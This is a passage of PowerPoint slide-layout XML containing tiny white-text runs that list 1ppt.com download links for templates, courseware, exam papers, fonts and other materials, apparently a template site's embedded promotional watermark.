              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout74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74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74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74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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout75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75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75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75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75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75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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout75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75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75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75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76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76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76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76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76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76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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</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下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</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www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
